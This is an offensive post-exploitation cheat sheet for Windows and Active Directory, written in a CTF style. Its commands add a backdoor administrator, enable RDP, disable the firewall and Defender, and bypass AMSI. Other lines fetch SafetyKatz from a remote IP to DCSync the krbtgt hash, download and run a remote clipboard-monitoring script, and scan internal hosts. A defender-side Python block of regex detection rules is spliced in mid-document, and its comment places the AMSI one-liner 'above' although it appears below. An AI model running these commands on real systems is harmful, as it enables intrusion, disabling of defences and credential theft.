Post Exploitation
Active Directory Post Exploitation Checklists
RDP Stuff
Add Local Administrator
Create the user asuka and add it to the Remote Desktop Users, Administrators, and Remote Management Users (WinRM) groups.
net user asuka 'TrYh@rdeR!' /add
net localgroup "Remote Desktop Users" asuka /add
net localgroup "Administrators" asuka /add
net localgroup "Remote Management Users" asuka /add
Enable RDP Access
Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server' -Name "fDenyTSConnections" -Value 0
Enable-NetFirewallRule -DisplayGroup "Remote Desktop"
# In case PowerShell is not available (e.g. on an old machine)
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
netsh advfirewall firewall set rule group="remote desktop" new enable=Yes
Access RDP
xfreerdp /dynamic-resolution +clipboard /cert:ignore /v:support.htb /u:asuka /p:'TrYh@rdeR!' +nego /drive:Tools,/home/asuka/Tools/ActiveDirectory/
rdesktop support.htb
# Fix ERRCONNECT_TLS_CONNECT_FAILED by lowering the OpenSSL security level (target only offers legacy TLS)
xfreerdp /dynamic-resolution +clipboard /cert:ignore /v:support.htb /u:asuka /p:'TrYh@rdeR!' +nego /drive:Tools,/home/asuka/Tools/ActiveDirectory/ /tls-seclevel:0
Defender and Firewall Stuff
Turn Off Firewall
# powershell
Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False
# cmd
netsh advfirewall set allprofiles state off
Disable Defender Real Time Monitoring
# Remove Defender signature definitions
cmd /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
Get-MpComputerStatus
Set-MpPreference -DisableRealtimeMonitoring $true
Set-MpPreference -DisableIOAVProtection $true
Set-MpPreference -ExclusionExtension "ps1"
Set-MPPreference -DisableBehaviorMonitoring $true
# Disable AMSI script scanning (set to 0 to re-enable)
Set-MpPreference -DisableScriptScanning 1
# List all excluded folders
Get-MpPreference | Select-Object -ExpandProperty ExclusionPath
# Add a folder exclusion (alternative when tamper protection is enabled)
Add-MpPreference -ExclusionPath C:\Mimikatz\
# Disable real-time protection via the Defender policy registry keys
reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
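As an added, defender-side example (not part of this cheat sheet), the Python below turns the RDP, Defender, firewall and local-admin commands from the sections above into detection rules and runs them over constructed process command lines; the rule names and sample lines are my own.

```python
import re

# Rules for the Defender/firewall/RDP tampering and local-admin commands
# in the checklist above, applied to one process command line (Sysmon
# event 1 / Security 4688 CommandLine, or a 4104 script block) at a time.
RULES = {
    "defender_protection_disabled":
        r"Set-MpPreference\b.*-Disable(RealtimeMonitoring|IOAVProtection|BehaviorMonitoring|ScriptScanning)\b",
    "defender_exclusion_added":
        r"(Add|Set)-MpPreference\b.*-Exclusion(Path|Extension|Process)\b",
    "defender_definitions_removed":
        r"MpCmdRun\.exe.*-RemoveDefinitions\b",
    "defender_policy_key_set":
        r"\breg(\.exe)?\s+add\b.*\\Windows Defender.*\bDisableAnti(Spyware|Virus)\b",
    "firewall_disabled":
        r"Set-NetFirewallProfile\b.*-Enabled\s+\$?false\b|netsh\s+advfirewall\s+set\s+allprofiles\s+state\s+off\b",
    "rdp_enabled":
        r"fDenyTSConnections\b.*(/d\s+0\b|-value\s+0\b)",
    "privileged_group_member_added":
        r'\bnet1?(\.exe)?\s+localgroup\s+"?(Administrators|Remote Desktop Users|Remote Management Users)"?\s+\S+\s+/add\b',
    # The AMSI one-liner above splits the strings "Amsi"/"amsiInitFailed",
    # so match the reflection calls it cannot hide instead of those strings.
    "amsi_reflection_patch":
        r"\[Ref\]\.Assembly\.GetType\(.*\.GetField\(.*NonPublic\s*,\s*Static",
}
COMPILED = {name: re.compile(rx, re.IGNORECASE) for name, rx in RULES.items()}


def classify(command_line: str) -> list[str]:
    """Return the names of every rule that matches one command line."""
    return [name for name, rx in COMPILED.items() if rx.search(command_line)]


def scan(lines: list[str]) -> list[tuple[int, str]]:
    """Return (line number, rule name) pairs for every hit in a list of lines."""
    return [(i, name) for i, line in enumerate(lines, 1) for name in classify(line)]


# Constructed sample command lines: five taken from the checklist, two benign.
SAMPLE_LINES = [
    'powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true',
    'reg add "HKLM\\Software\\Policies\\Microsoft\\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f',
    'net localgroup "Administrators" asuka /add',
    'netsh advfirewall set allprofiles state off',
    "powershell.exe $a='si';$b='Am';$Ref=[Ref].Assembly.GetType(('System.Management.Automation.{0}{1}Utils'-f $b,$a)); $z=$Ref.GetField(('am{0}InitFailed'-f$a),'NonPublic,Static');$z.SetValue($null,$true)",
    'powershell.exe Get-MpComputerStatus',
    'net localgroup Administrators',
]
```

`scan(SAMPLE_LINES)` flags the first five lines and leaves the two benign ones alone; the same rules apply unchanged to Sysmon or 4688 exports once the CommandLine field is extracted.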
Bypassing PowerShell Security
Using InviShell - https://github.com/OmerYa/Invisi-Shell
C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat
AMSI Bypass
Detection (find which strings trigger AMSI): https://github.com/RythmStick/AMSITrigger
$a='si';$b='Am';$Ref=[Ref].Assembly.GetType(('System.Management.Automation.{0}{1}Utils'-f $b,$a)); $z=$Ref.GetField(('am{0}InitFailed'-f$a),'NonPublic,Static');$z.SetValue($null,$true)
OPSEC with Loader
C:\AD\Tools\Loader.exe -path http://172.16.100.67/SafetyKatz.exe "lsadump::dcsync /user:dcorp\krbtgt" "exit"
Get-ClipboardContents
Monitors the clipboard on a specified interval for changes to copied text.
iex (iwr -usebasicparsing https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/collection/Get-ClipboardContents.ps1);Get-ClipboardContents
WADComs
WADComs is an interactive cheat sheet, containing a curated list of offensive security tools and their respective commands, to be used against Windows/AD environments.
Dump Saved Password
Mimikatz
TCP Port Scanner
# powershell
1..1024 | % {echo ((new-object Net.Sockets.TcpClient).Connect("172.16.8.1",$_)) "Port $_ is open!"} 2>$null
Ping Sweep
# cmd
for /l %i in (1,1,254) do @ping -n 1 -w 100 172.16.8.%i > nul && echo 172.16.8.%i is up.
Inveigh
Responder, but written in PowerShell/C#.
MDE Enum
How to extract Windows Defender exclusions and Attack Surface Reduction (ASR) rules without admin privileges.
# local
mde-enum.exe /local /paths /access
# remote
mde-enum.exe <ip> <username> <password> <domain> /paths
# e.g.
.\mde-enum.exe 172.16.8.148 asuka Asuka@1337 child.zerobyte.lab /paths

Or, use this PowerShell script, which reads Defender's configuration-change events (ID 5007) and prints the excluded paths they record.
# Defender operational log; event ID 5007 is written on every configuration change
$logName = "Microsoft-Windows-Windows Defender/Operational"
$eventID = 5007
$events = Get-WinEvent -LogName $logName | Where-Object { $_.Id -eq $eventID }
# Keep only the changes that touched the Exclusions registry keys
$exclusionEvents = $events | Where-Object { $_.Message -match "Exclusions" }
# Regex for the path-exclusion value name recorded in the event message
$pattern = "HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\Paths\\[^\s]+"
$exclusionEvents | ForEach-Object {
    if ($_.Message -match $pattern) {
        $matches[0]
    }
}

Reference:
Other Useful Stuff